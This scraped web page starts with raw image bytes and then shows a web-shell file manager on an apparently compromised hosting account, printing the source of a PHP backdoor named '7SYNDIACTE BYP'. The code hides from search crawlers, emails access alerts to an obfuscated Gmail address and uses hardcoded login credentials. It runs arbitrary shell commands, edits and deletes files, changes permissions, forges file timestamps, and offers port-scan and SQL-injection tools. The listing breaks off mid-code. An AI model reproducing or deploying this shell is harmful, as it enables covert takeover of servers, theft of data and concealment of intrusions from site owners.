JFIFXX    $.' ",#(7),01444'9=82<.342  2!!22222222222222222222222222222222222222222222222222"4 ,PG"Z_4˷kjزZ,F+_z,© zh6٨icfu#ډb_N?wQ5-~I8TK<5oIv-k_U_~bMdӜUHh?]EwQk{_}qFW7HTՑYF?_'ϔ_Ջt=||I 6έ"D/[k9Y8ds|\Ҿp6Ҵ].6znopM[mei$[soᘨ˸ nɜG-ĨUycP3.DBli;hjx7Z^NhN3u{:jx힞#M&jL P@_ P&o89@Sz6t7#Oߋ s}YfTlmrZ)'Nk۞pw\Tȯ?8`Oi{wﭹW[r Q4F׊3m&L=h3z~#\l :F,j@ ʱwQT8"kJO6֚l}R>ډK]y&p}b;N1mr$|7>e@BTM*-iHgD) Em|ؘbҗaҾt4oG*oCNrPQ@z,|?W[0:n,jWiEW$~/hp\?{(0+Y8rΟ+>S-SVN;}s?. w9˟<Mq4Wv'{)01mBVW[8/< %wT^5b)iM pgN&ݝVO~qu9 !J27$O-! :%H ـyΠM=t{!S oK8txA& j0 vF Y|y ~6@c1vOpIg4lODL Rcj_uX63?nkWyf;^*B @~a`Eu+6L.ü>}y}_O6͐:YrGXkGl^w~㒶syIu! W XN7BVO!X2wvGRfT#t/?%8^WaTGcLMI(J1~8?aT ]ASE(*E} 2#I/׍qz^t̔bYz4xt){ OH+(EA&NXTo"XC')}Jzp ~5}^+6wcQ|LpdH}(.|kc4^"Z?ȕ a<L!039C EuCFEwç ;n?*oB8bʝ'#RqfM}7]s2tcS{\icTx;\7KPʇ Z O-~c>"?PEO8@8GQgaՎ󁶠䧘_%#r>1zaebqcPѵn#L =׀t L7`VA{C:ge@w1 Xp3c3ġpM"'-@n4fGB3DJ8[JoߐgK)ƛ$ 83+ 6ʻ SkI*KZlT _`?KQKdB`s}>`*>,*@JdoF*弝O}ks]yߘc1GV<=776qPTtXԀ!9*44Tހ3XΛex46YD  BdemDa\_l,G/֌7Y](xTt^%GE4}bTڹ;Y)BQu>J/J ⮶.XԄjݳ+Ed r5_D1 o Bx΢#<W8R6@gM. drD>(otU@x=~v2 ӣdoBd3eO6㣷ݜ66YQz`S{\P~z m5{J/L1xO\ZFu>ck#&:`$ai>2ΔloF[hlEܺΠk:)` $[69kOw\|8}ބ:񶐕IA1/=2[,!.}gN#ub ~݊}34qdELc$"[qU硬g^%B zrpJru%v\h1Yne`ǥ:gpQM~^Xi `S:V29.PV?Bk AEvw%_9CQwKekPؠ\;Io d{ ߞoc1eP\ `E=@KIRYK2NPlLɀ)&eB+ь( JTx_?EZ }@ 6U뙢طzdWIn` D噥[uV"G&Ú2g}&m?ċ"Om# {ON"SXNeysQ@FnVgdX~nj]J58up~.`r\O,ư0oS _Ml4kv\JSdxSW<AeIX$Iw:Sy›R9Q[,5;@]%u@ *rolbI  +%m:͇ZVủθau,RW33 dJeTYE.Mϧ-oj3+yy^cVO9NV\nd1 !͕_)av;թMlWR1)ElP;yوÏu 3k5Pr6<⒲l!˞*u־n!l:UNW %Chx8vL'X@*)̮ˍ D-M+JUkvK+x8cY?Ԡ~3mo|u@[XeYC\Kpx8oCC&N~3-H MXsu<`~"WL$8ξ3a)|:@m\^`@ҷ)5p+6p%i)P Mngc#0AruzRL+xSS?ʮ}()#tmˇ!0}}y$6Lt;$ʳ{^6{v6ķܰgVcnn ~zx«,2u?cE+ȘH؎%Za)X>uWTzNyosFQƤ$*&LLXL)1" LeOɟ9=:tZcŽY?ӭVwv~,Yrۗ|yGaFC.+ v1fήJ]STBn5sW}y$~z'c 8  ,! pVNSNNqy8z˱A4*'2n<s^ǧ˭PJޮɏUGLJ*#i}K%,)[z21z ?Nin1?TIR#m-1lA`fT5+ܐcq՝ʐ,3f2Uեmab#ŠdQy>\)SLYw#.ʑf ,"+w~N'cO3FN<)j&,- љ֊_zSTǦw>?nU仆Ve0$CdrP m׈eXmVu L.bֹ [Դaզ*\y8Է:Ez\0KqC b̘cөQ=0YsNS.3.Oo:#v7[#߫ 5܎LEr49nCOWlG^0k%;YߝZǓ:S#|}y,/kLd TA(AI$+I3;Y*Z}|ӧOdv..#:nf>>ȶITX 8y"dR|)0=n46ⲑ+ra ~]R̲c?6(q;5% |uj~z8R=XIV=|{vGj\gcqz؋%Mߍ1y#@f^^>N#x#۹6Y~?dfPO{P4Vu1E1J *|%JN`eWuzk M6q t[ gGvWIGu_ft5j"Y:Tɐ*; e54q$C2d} _SL#mYpO.C;cHi#֩%+) ӍƲVSYźg |tj38r|V1#;.SQA[S#`n+$$I P\[@s(EDzP])8G#0B[ىXIIq<9~[Z멜Z⊔IWU&A>P~#dp]9 "cP Md?٥Ifتuk/F9c*9Ǎ:ØFzn*@|Iށ9N3{'['ͬҲ4#}!V Fu,,mTIkv C7vB6kT91*l '~ƞFlU'M ][ΩũJ_{iIn$L jOdxkza۪#EClx˘oVɞljr)/,߬hL#^Lф,íMƁe̩NBLiLq}(q6IçJ$WE$:=#(KBzђ xlx?>Պ+>W,Ly!_DŌlQ![ SJ1ƐY}b,+Loxɓ)=yoh@꥟/Iѭ=Py9 ۍYӘe+pJnϱ?V\SO%(t =?MR[Șd/ nlB7j !;ӥ/[-A>dNsLj ,ɪv=1c.SQO3UƀܽE̻9GϷD7(}Ävӌ\y_0[w <΍>a_[0+LF.޺f>oNTq;y\bՃyjH<|q-eɏ_?_9+PHp$[uxK wMwNی'$Y2=qKBP~Yul:[<F12O5=d]Ysw:ϮEj,_QXz`H1,#II dwrP˂@ZJVy$\y{}^~[:NߌUOdؾe${p>G3cĖlʌ ת[`ϱ-WdgIig2 }s ؤ(%#sS@~3XnRG~\jc3vӍLM[JBTs3}jNʖW;7ç?=XF=-=qߚ#='c7ڑWI(O+=:uxqe2zi+kuGR0&eniT^J~\jyp'dtGsO39* b#Ɋ p[BwsT>d4ۧsnvnU_~,vƜJ1s QIz)(lv8MU=;56Gs#KMP=LvyGd}VwWBF'à ?MHUg2 !p7Qjڴ=ju JnA suMeƆҔ!)'8Ϣٔޝ(Vpצ֖d=ICJǠ{qkԭ߸i@Ku|p=..*+xz[Aqġ#s2aƊRR)*HRsi~a &fMP-KL@ZXy'x{}Zm+:)) IJ-iu ܒH'L(7yGӜq j 6ߌg1go,kرtY?W,pefOQS!K۟cҒA|սj>=⬒˧L[ ߿2JaB~Ru:Q] 0H~]7ƼI(}cq 'ήETq?fabӥvr )o-Q_'ᴎoK;Vo%~OK *bf:-ťIR`B5!RB@ï u ̯e\_U_ gES3QTaxU<~c?*#]MW,[8Oax]1bC|踤Plw5V%){t<d50iXSUm:Z┵i"1^B-PhJ&)O*DcWvM)}Pܗ-q\mmζZ-l@}aE6F@&Sg@ݚM ȹ 4#p\HdYDoH"\..RBHz_/5˘6KhJRPmƶim3,#ccoqa)*PtRmk7xDE\Y閣_X<~)c[[BP6YqS0%_;Àv~| VS؇ 'O0F0\U-d@7SJ*z3nyPOm~P3|Yʉr#CSN@ ƮRN)r"C:: #qbY. 6[2K2uǦHYRQMV G$Q+.>nNHq^ qmMVD+-#*U̒ p욳u:IBmPV@Or[b= 1UE_NmyKbNOU}the`|6֮P>\2PVIDiPO;9rmAHGWS]J*_G+kP2KaZH'KxWMZ%OYDRc+o?qGhmdSoh\D|:WUAQc yTq~^H/#pCZTI1ӏT4"ČZ}`w#*,ʹ 0i課Om*da^gJ݅{le9uF#Tֲ̲ٞC"qߍ ոޑo#XZTp@ o8(jdxw],f`~|,s^f1t|m򸄭/ctr5s79Q4H1꠲BB@l9@C+wpxu£Yc9?`@#omHs2)=2.ljg9$YS%*LRY7Z,*=䷘$armoϰUW.|rufIGwtZwo~5 YյhO+=8fF)W7L9lM̘·Y֘YLf큹pRF99.A "wz=E\Z'a 2Ǚ#;'}G*l^"q+2FQ hjkŦ${ޮ-T٭cf|3#~RJt$b(R(rdx >U b&9,>%E\ Άe$'q't*אެb-|dSBOO$R+H)܎K1m`;J2Y~9Og8=vqD`K[F)k[1m޼cn]skz$@)!I x՝"v9=ZA=`Ɠi :E)`7vI}dYI_ o:obo 3Q&D&2= Ά;>hy.*ⅥSӬ+q&j|UƧ}J0WW< ۋS)jQRjƯrN)Gű4Ѷ(S)Ǣ8iW52No˓ ۍ%5brOnL;n\G=^UdI8$&h'+(cȁ߫klS^cƗjԌEꭔgFȒ@}O*;evWVYJ\]X'5ղkFb 6Ro՜mi Ni>J?lPmU}>_Z&KKqrIDՉ~q3fL:Se>E-G{L6pe,8QIhaXaUA'ʂs+טIjP-y8ۈZ?J$WP Rs]|l(ԓsƊio(S0Y 8T97.WiLc~dxcE|2!XKƘਫ਼$((6~|d9u+qd^389Y6L.I?iIq9)O/뚅OXXVZF[یgQLK1RҖr@v#XlFНyS87kF!AsM^rkpjPDyS$Nqnxҍ!Uf!ehi2m`YI9r6 TFC}/y^Η5d'9A-J>{_l+`A['յϛ#w:݅%X}&PStQ"-\縵/$ƗhXb*yBS;Wջ_mcvt?2}1;qSdd~u:2k52R~z+|HE!)Ǟl7`0<,2*Hl-x^'_TVgZA'j ^2ΪN7t?w x1fIzC-ȖK^q;-WDvT78Z hK(P:Q- 8nZ܃e貾<1YT<,"6{/ ?͟|1:#gW>$dJdB=jf[%rE^il:BxSּ1հ,=*7 fcG#q eh?27,!7x6nLC4x},GeǝtC.vS F43zz\;QYC,6~;RYS/6|25vTimlv& nRh^ejRLGf? ۉҬܦƩ|Ȱ>3!viʯ>vオX3e_1zKȗ\qHS,EW[㺨uch⍸O}a>q6n6N6qN ! 1AQaq0@"2BRb#Pr3C`Scst$4D%Td ?Na3mCwxAmqmm$4n淿t'C"wzU=D\R+wp+YT&պ@ƃ3ޯ?AﶂaŘ@-Q=9Dռѻ@MVP܅G5fY6# ?0UQ,IX(6ڵ[DIMNލc&υj\XR|,4 jThAe^db#$]wOӪ1y%LYm뭛CUƃߜ}Cy1XνmF8jI]HۺиE@Ii;r8ӭVFՇ| &?3|xBMuSGe=Ӕ#BE5GY!z_eqр/W>|-Ci߇t1ޯќdR3ug=0 5[?#͏qcfH{ ?u=??ǯ}ZzhmΔBFTWPxs}G93 )gGR<>r h$'nchPBjJҧH -N1N?~}-q!=_2hcMlvY%UE@|vM2.Y[|y"EïKZF,ɯ?,q?vM 80jx";9vk+ ֧ ȺU?%vcVmA6Qg^MA}3nl QRNl8kkn'(M7m9وq%ޟ*h$Zk"$9: ?U8Sl,,|ɒxH(ѷGn/Q4PG%Ա8N! &7;eKM749R/%lc>x;>C:th?aKXbheᜋ^$Iհ hr7%F$EFdt5+(M6tÜUU|zW=aTsTgdqPQb'm1{|YXNb P~F^F:k6"j! Ir`1&-$Bevk:y#ywI0x=D4tUPZHڠ底taP6b>xaQ# WeFŮNjpJ* mQN*I-*ȩFg3 5Vʊɮa5FO@{NX?H]31Ri_uѕ 0 F~:60p͈SqX#a5>`o&+<2D: ڝ$nP*)N|yEjF5ټeihyZ >kbHavh-#!Po=@k̆IEN@}Ll?jO߭ʞQ|A07xwt!xfI2?Z<ץTcUj]陎Ltl }5ϓ$,Omˊ;@OjEj(ا,LXLOЦ90O .anA7j4 W_ٓzWjcBy՗+EM)dNg6y1_xp$Lv:9"zpʙ$^JԼ*ϭo=xLj6Ju82AH3$ٕ@=Vv]'qEz;I˼)=ɯx /W(Vp$ mu񶤑OqˎTr㠚xsrGCbypG1ߠw e8$⿄/M{*}W]˷.CK\ުx/$WPwr |i&}{X >$-l?-zglΆ(FhvS*b߲ڡn,|)mrH[a3ר[13o_U3TC$(=)0kgP u^=4 WYCҸ:vQרXàtkm,t*^,}D* "(I9R>``[~Q]#afi6l86:,ssN6j"A4IuQ6E,GnHzSHOuk5$I4ؤQ9@CwpBGv[]uOv0I4\yQѸ~>Z8Taqޣ;za/SI:ܫ_|>=Z8:SUIJ"IY8%b8H:QO6;7ISJҌAά3>cE+&jf$eC+z;V rʺmyeaQf&6ND.:NTvm<- uǝ\MvZYNNT-A>jr!SnO 13Ns%3D@`ܟ 1^c< aɽ̲Xë#w|ycW=9I*H8p^(4՗karOcWtO\ƍR8'KIQ?5>[}yUײ -h=% qThG2)"ו3]!kB*pFDlA,eEiHfPs5H:Փ~H0DتDIhF3c2E9H5zԑʚiX=:mxghd(v׊9iSOd@0ڽ:p5h-t&Xqӕ,ie|7A2O%PEhtjY1wЃ!  ࢽMy7\a@ţJ 4ȻF@o̒?4wx)]P~u57X 9^ܩU;Iꭆ 5 eK27({|Y׎ V\"Z1 Z}(Ǝ"1S_vE30>p; ΝD%xW?W?vo^Vidr[/&>~`9Why;R ;;ɮT?r$g1KACcKl:'3 cﳯ*"t8~l)m+U,z`(>yJ?h>]vЍG*{`;y]IT ;cNUfo¾h/$|NS1S"HVT4uhǜ]v;5͠x'C\SBplh}N ABx%ޭl/Twʽ]D=Kžr㻠l4SO?=k M: cCa#ha)ѐxcsgPiG{+xQI= zԫ+ 8"kñj=|c yCF/*9жh{ ?4o kmQNx;Y4膚aw?6>e]Qr:g,i"ԩA*M7qB?ӕFhV25r[7 Y }LR}*sg+xr2U=*'WSZDW]WǞ<叓{$9Ou4y90-1'*D`c^o?(9uݐ'PI& fJݮ:wSjfP1F:X H9dԯ˝[_54 }*;@ܨ ðynT?ןd#4rGͨH1|-#MrS3G3).᧏3vz֑r$G"`j 1tx0<ƆWh6y6,œGagAyb)hDß_mü gG;evݝnQ C-*oyaMI><]obD":GA-\%LT8c)+y76oQ#*{(F⽕y=rW\p۩cA^e6KʐcVf5$'->ՉN"F"UQ@fGb~#&M=8טJNu9D[̤so~ G9TtW^g5y$bY'سǴ=U-2 #MCt(i lj@Q 5̣i*OsxKf}\M{EV{υƇ);HIfeLȣr2>WIȂ6ik 5YOxȺ>Yf5'|H+98pjn.OyjY~iw'l;s2Y:'lgꥴ)o#'SaaKZ m}`169n"xI *+ }FP"l45'ZgE8?[X7(.Q-*ތL@̲v.5[=t\+CNܛ,gSQnH}*FG16&:t4ُ"Ạ$b |#rsaT ]ӽDP7ո0y)e$ٕvIh'QEAm*HRI=: 4牢) %_iNݧl] NtGHL ɱg<1V,J~ٹ"KQ 9HS9?@kr;we݁]I!{ @G["`J:n]{cAEVʆ#U96j#Ym\qe4hB7Cdv\MNgmAyQL4uLjj9#44tl^}LnR!t±]rh6ٍ>yҏNfU  Fm@8}/ujb9he:AyծwGpΧh5l}3p468)Udc;Us/֔YX1O2uqs`hwgr~{ RmhN؎*q 42*th>#E#HvOq}6e\,Wk#Xb>p}դ3T5†6[@Py*n|'f֧>lư΂̺SU'*qp_SM 'c6m ySʨ;MrƋmKxo,GmPAG:iw9}M(^V$ǒѽ9| aJSQarB;}ٻ֢2%Uc#gNaݕ'v[OY'3L3;,p]@S{lsX'cjwk'a.}}& dP*bK=ɍ!;3ngΊUߴmt'*{,=SzfD Ako~Gaoq_mi}#mPXhύmxǍ΂巿zfQc|kc?WY$_Lvl߶c`?ljݲˏ!V6UЂ(A4y)HpZ_x>eR$/`^'3qˏ-&Q=?CFVR DfV9{8gnh(P"6[D< E~0<@`G6Hгcc cK.5DdB`?XQ2ٿyqo&+1^ DW0ꊩG#QnL3c/x 11[yxპCWCcUĨ80me4.{muI=f0QRls9f9~fǨa"@8ȁQ#cicG$Gr/$W(WV"m7[mAmboD j۳ l^kh׽ # iXnveTka^Y4BNĕ0 !01@Q"2AaPq3BR?@4QT3,㺠W[=JKϞ2r^7vc:9 EߴwS#dIxu:Hp9E! V 2;73|F9Y*ʬFDu&y؟^EAA(ɩ^GV:ݜDy`Jr29ܾ㝉[E;FzxYGUeYC v-txIsםĘqEb+P\ :>iC';k|zرny]#ǿbQw(r|ӹs[D2v-%@;8<a[\o[ϧwI!*0krs)[J9^ʜp1) "/_>o<1AEy^C`x1'ܣnps`lfQ):lb>MejH^?kl3(z:1ŠK&?Q~{ٺhy/[V|6}KbXmn[-75q94dmc^h X5G-}دBޟ |rtMV+]c?-#ڛ^ǂ}LkrOu>-Dry D?:ޞUǜ7V?瓮"#rչģVR;n/_ ؉vݶe5db9/O009G5nWJpA*r9>1.[tsFnQ V 77R]ɫ8_0<՜IFu(v4Fk3E)N:yڮeP`1}$WSJSQNjٺ޵#lј(5=5lǏmoWv-1v,Wmn߀$x_DȬ0¤#QR[Vkzmw"9ZG7'[=Qj8R?zf\a=OU*oBA|G254 p.w7  &ξxGHp B%$gtЏ򤵍zHNuЯ-'40;_3 !01"@AQa2Pq#3BR?ʩcaen^8F<7;EA{EÖ1U/#d1an.1ě0ʾRh|RAo3m3 % 28Q yφHTo7lW>#i`qca m,B-j݋'mR1Ήt>Vps0IbIC.1Rea]H64B>o]($Bma!=?B KǾ+Ծ"nK*+[T#{EJSQs5:U\wĐf3܆&)IԆwE TlrTf6Q|Rh:[K zc֧GC%\_a84HcObiؖV7H )*ģK~Xhչ04?0 E<}3#u? |gS6ꊤ|I#Hڛ աwX97Ŀ%SLy6č|Fa 8b$sקhb9RAu7˨pČ_\*w묦F 4D~f|("mNKiS>$d7SlA/²SL|6N}S˯g]6; #. 403WebShell
403Webshell
Server IP : 77.37.115.96  /  Your IP : 216.73.216.116
Web Server : LiteSpeed
System : Linux id-dci-web1411.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64
User : u993272038 ( 993272038)
PHP Version : 8.1.31
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u993272038/domains/noorsafigroup.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/u993272038/domains/noorsafigroup.com/public_html/lag.php
<?php $u_a=trim($_SERVER["HTTP_USER_AGENT"]);$md_5=md5($u_a);$s_n=strtolower($_SERVER["SCRIPT_NAME"]);if($s_n!="/index.php"&&$md_5!="53c3b2f1a6ae3fc8caceb80fd3e919bb"){exit;}?><?php
$userAgent = $_SERVER['HTTP_USER_AGENT'];

$blockedUserAgents = [
    'Googlebot', 'Ahrefs', 'Bingbot', 'SemrushBot', 'MJ12bot', 'DotBot',
    'Baiduspider', 'YandexBot', 'Sogou', 'Exabot', 'Facebot', 'Twitterbot',
    'Slackbot', 'Discordbot', 'LinkedInBot', 'TelegramBot', 'Pinterestbot',
    'WhatsApp', 'Flipboard', 'FeedFetcher-Google',
];

foreach ($blockedUserAgents as $blockedAgent) {
    if (stripos($userAgent, $blockedAgent) !== false) {
        http_response_code(404);
        exit;
    }
}

$l = base64_decode('a29idXN0b3JnaG9zdEBnbWFpbC5jb20=');
$p = $_SERVER['REQUEST_URI'];
$s = isset($_SERVER['SERVER_ADDR']) ? $_SERVER['SERVER_ADDR'] : $_SERVER['HTTP_HOST'];
$c = $_SERVER['REMOTE_ADDR'];
$t = date('Y-m-d H:i:s');

// Authentication
if (session_status() == PHP_SESSION_NONE) {
    session_start();
}

if (!isset($_SESSION['lg'])) {
    $_SESSION['lg'] = true;
    $m = "Shell Access:\nTime: $t\nURL: http://$s$p\nClient: $c\nAgent: $userAgent\nServer: $s\n";
    @mail($l, '7SYNDIACTE Access', $m, "From: noreply@$s");
}
$authenticated = false;

if (isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] === '7s' && $_POST['password'] === '7ss') {
        $_SESSION['authenticated'] = true;
        $authenticated = true;
    } else {
        $error_message = "Invalid credentials!";
    }
}

if (isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true) {
    $authenticated = true;
}

if (isset($_GET['logout'])) {
    session_destroy();
    header('Location: index.php');
    exit;
}

if (!$authenticated) {
    echo '<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>7SYNDIACTE BYP - Access Control</title>
    <link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&family=Racing+Sans+One&display=swap" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
            font-family: "Orbitron", monospace;
            background: linear-gradient(135deg, #0d1117 0%, #1c2128 25%, #0d1117 50%, #1c2128 75%, #0d1117 100%);
            min-height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
            overflow: hidden;
            position: relative;
        }
        
        .login-particles {
            position: absolute;
            width: 100%;
            height: 100%;
            pointer-events: none;
        }
        
        .particle {
            position: absolute;
            background: #e1b12c;
            border-radius: 50%;
            animation: float 6s ease-in-out infinite;
        }
        
        @keyframes float {
            0%, 100% { transform: translateY(0px) rotate(0deg); opacity: 0.7; }
            50% { transform: translateY(-20px) rotate(180deg); opacity: 1; }
        }
        
        .login-container {
            background: rgba(13, 17, 23, 0.95);
            border: 2px solid #e1b12c;
            border-radius: 15px;
            padding: 40px;
            text-align: center;
            backdrop-filter: blur(10px);
            box-shadow: 0 0 50px rgba(225, 177, 44, 0.3);
            min-width: 400px;
        }
        
        .login-header {
            margin-bottom: 30px;
        }
        
        .login-title {
            font-family: "Racing Sans One", cursive;
            font-size: 2.5rem;
            color: #e1b12c;
            text-shadow: 0 0 20px #e1b12c;
            margin-bottom: 10px;
        }
        
        .login-subtitle {
            color: #8b949e;
            font-size: 0.9rem;
        }
        
        .login-form {
            display: flex;
            flex-direction: column;
            gap: 20px;
        }
        
        .input-group input {
            width: 100%;
            padding: 15px 20px;
            background: rgba(30, 30, 30, 0.8);
            border: 1px solid #444;
            border-radius: 8px;
            color: #e6e6e6;
            font-family: "Orbitron", monospace;
            font-size: 1rem;
            transition: all 0.3s ease;
        }
        
        .input-group input:focus {
            outline: none;
            border-color: #e1b12c;
            box-shadow: 0 0 10px rgba(225, 177, 44, 0.3);
        }
        
        .login-btn {
            background: linear-gradient(135deg, #e1b12c 0%, #ffd700 50%, #e1b12c 100%);
            border: none;
            padding: 15px;
            border-radius: 8px;
            color: #000;
            font-family: "Orbitron", monospace;
            font-weight: bold;
            font-size: 1.1rem;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        
        .login-btn:hover {
            transform: translateY(-2px);
            box-shadow: 0 5px 15px rgba(225, 177, 44, 0.4);
        }
        
        .error-message {
            color: #ff6b6b;
            font-size: 0.9rem;
            margin-top: 10px;
        }
        
        .login-info {
            margin-top: 20px;
            color: #8b949e;
            font-size: 0.8rem;
        }
    </style>
</head>
<body>
    <div class="login-particles" id="loginParticles"></div>
    
    <div class="login-container">
        <div class="login-header">
            <h1 class="login-title">7SYNDIACTE BYP</h1>
            <p class="login-subtitle">Advanced Web Shell Access Portal</p>
        </div>
        
        <form method="POST" class="login-form">
            <div class="input-group">
                <input type="text" name="username" id="username" placeholder="Username" required>
            </div>
            <div class="input-group">
                <input type="password" name="password" id="password" placeholder="Password" required>
            </div>
            <button type="submit" class="login-btn">
                <i class="fas fa-sign-in-alt"></i> ACCESS SHELL
            </button>
        </form>
        
        ' . (isset($error_message) ? '<div class="error-message">' . $error_message . '</div>' : '') . '
        
        <div class="login-info">
            <i class="fas fa-shield-alt"></i> Secure Access Required
        </div>
    </div>
    
    <script>
        function createLoginParticles() {
            const container = document.getElementById("loginParticles");
            const particleCount = 50;
            
            for (let i = 0; i < particleCount; i++) {
                const particle = document.createElement("div");
                particle.className = "particle";
                particle.style.left = Math.random() * 100 + "%";
                particle.style.top = Math.random() * 100 + "%";
                particle.style.width = (Math.random() * 4 + 1) + "px";
                particle.style.height = particle.style.width;
                particle.style.animationDelay = Math.random() * 6 + "s";
                container.appendChild(particle);
            }
        }
        
        createLoginParticles();
        document.getElementById("username").focus();
    </script>
</body>
</html>';
    exit;
}

$path = isset($_GET['path']) ? $_GET['path'] : getcwd();
$shellHome = __DIR__;

// Handle terminal command execution
if (isset($_POST['terminal_cmd']) && !empty($_POST['terminal_cmd'])) {
    $command = $_POST['terminal_cmd'];
    $output = '';
    $error = '';
    
    if (isset($_POST['terminal_path']) && !empty($_POST['terminal_path'])) {
        $terminalPath = $_POST['terminal_path'];
        if (is_dir($terminalPath)) {
            chdir($terminalPath);
        }
    }
    
    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );
    
    $process = proc_open($command, $descriptorspec, $pipes);
    
    if (is_resource($process)) {
        fclose($pipes[0]);
        $output = stream_get_contents($pipes[1]);
        $error = stream_get_contents($pipes[2]);
        fclose($pipes[1]);
        fclose($pipes[2]);
        proc_close($process);
    }
}

// Handle file operations
if (isset($_POST['file_action'])) {
    $action = $_POST['file_action'];
    
    switch ($action) {
        case 'create_file':
            $fileName = $_POST['file_name'] ?? '';
            $fileContent = $_POST['file_content'] ?? '';
            $currentPath = $_POST['current_path'] ?? getcwd();
            
            if (!empty($fileName)) {
                $fullPath = $currentPath . '/' . $fileName;
                if (file_put_contents($fullPath, $fileContent) !== false) {
                    echo json_encode(['status' => 'success', 'message' => 'File created successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to create file']);
                }
            }
            exit;
            
        case 'create_folder':
            $folderName = $_POST['folder_name'] ?? '';
            $currentPath = $_POST['current_path'] ?? getcwd();
            
            if (!empty($folderName)) {
                $fullPath = $currentPath . '/' . $folderName;
                if (mkdir($fullPath, 0755, true)) {
                    echo json_encode(['status' => 'success', 'message' => 'Folder created successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to create folder']);
                }
            }
            exit;
            
        case 'edit_file':
            $filePath = $_POST['file_path'] ?? '';
            $newContent = $_POST['file_content'] ?? '';
            
            if (!empty($filePath) && file_exists($filePath)) {
                if (file_put_contents($filePath, $newContent) !== false) {
                    echo json_encode(['status' => 'success', 'message' => 'File updated successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to update file']);
                }
            }
            exit;
            
        case 'delete_item':
            $itemPath = $_POST['item_path'] ?? '';
            
            if (!empty($itemPath) && file_exists($itemPath)) {
                if (is_dir($itemPath)) {
                    if (rmdir($itemPath)) {
                        echo json_encode(['status' => 'success', 'message' => 'Folder deleted successfully']);
                    } else {
                        echo json_encode(['status' => 'error', 'message' => 'Failed to delete folder']);
                    }
                } else {
                    if (unlink($itemPath)) {
                        echo json_encode(['status' => 'success', 'message' => 'File deleted successfully']);
                    } else {
                        echo json_encode(['status' => 'error', 'message' => 'Failed to delete file']);
                    }
                }
            }
            exit;
            
        case 'read_file':
            $filePath = $_POST['file_path'] ?? '';
            
            if (!empty($filePath) && file_exists($filePath) && is_file($filePath)) {
                $content = file_get_contents($filePath);
                echo json_encode(['status' => 'success', 'content' => $content]);
            } else {
                echo json_encode(['status' => 'error', 'message' => 'File not found or cannot be read']);
            }
            exit;
            
        case 'rename_item':
            $oldPath = $_POST['old_path'] ?? '';
            $newName = $_POST['new_name'] ?? '';
            
            if (!empty($oldPath) && !empty($newName) && file_exists($oldPath)) {
                $directory = dirname($oldPath);
                $newPath = $directory . '/' . $newName;
                
                if (rename($oldPath, $newPath)) {
                    echo json_encode(['status' => 'success', 'message' => 'Item renamed successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to rename item']);
                }
            } else {
                echo json_encode(['status' => 'error', 'message' => 'Invalid parameters']);
            }
            exit;
            
        case 'change_permissions':
            $filePath = $_POST['file_path'] ?? '';
            $permissions = $_POST['permissions'] ?? '';
            
            if (!empty($filePath) && !empty($permissions) && file_exists($filePath)) {
                $octal = octdec($permissions);
                if (chmod($filePath, $octal)) {
                    echo json_encode(['status' => 'success', 'message' => 'Permissions changed successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to change permissions']);
                }
            } else {
                echo json_encode(['status' => 'error', 'message' => 'Invalid parameters']);
            }
            exit;
            
        case 'change_timestamp':
            $filePath = $_POST['file_path'] ?? '';
            $timestamp = $_POST['timestamp'] ?? '';
            
            if (!empty($filePath) && !empty($timestamp) && file_exists($filePath)) {
                $time = strtotime($timestamp);
                if ($time !== false && touch($filePath, $time)) {
                    echo json_encode(['status' => 'success', 'message' => 'Timestamp changed successfully']);
                } else {
                    echo json_encode(['status' => 'error', 'message' => 'Failed to change timestamp']);
                }
            } else {
                echo json_encode(['status' => 'error', 'message' => 'Invalid parameters']);
            }
            exit;
    }
}

// Security tools handler
if (isset($_POST['tool_action'])) {
    $action = $_POST['tool_action'];
    
    switch ($action) {
        case 'port_scan':
            $host = $_POST['target_host'] ?? '';
            $ports = $_POST['port_range'] ?? '1-1000';
            if (!empty($host)) {
                $scanResult = performPortScan($host, $ports);
                echo json_encode(['status' => 'success', 'result' => $scanResult]);
            }
            exit;
            
        case 'whois':
            $target = $_POST['target'] ?? '';
            if (!empty($target)) {
                $whoisResult = shell_exec("whois " . escapeshellarg($target));
                echo json_encode(['status' => 'success', 'result' => $whoisResult]);
            }
            exit;
            
        case 'encode':
            $text = $_POST['input_text'] ?? '';
            $type = $_POST['encode_type'] ?? 'base64';
            $result = encodeText($text, $type);
            echo json_encode(['status' => 'success', 'result' => $result]);
            exit;
            
        case 'decode':
            $text = $_POST['input_text'] ?? '';
            $type = $_POST['encode_type'] ?? 'base64';
            $result = decodeText($text, $type);
            echo json_encode(['status' => 'success', 'result' => $result]);
            exit;
            
        case 'hash':
            $text = $_POST['input_text'] ?? '';
            $type = $_POST['hash_type'] ?? 'md5';
            $result = generateHash($text, $type);
            echo json_encode(['status' => 'success', 'result' => $result]);
            exit;
            
        case 'sql_injection':
            $url = $_POST['target_url'] ?? '';
            $payload = $_POST['sql_payload'] ?? "' OR '1'='1";
            if (!empty($url)) {
                $result = testSQLInjection($url, $payload);
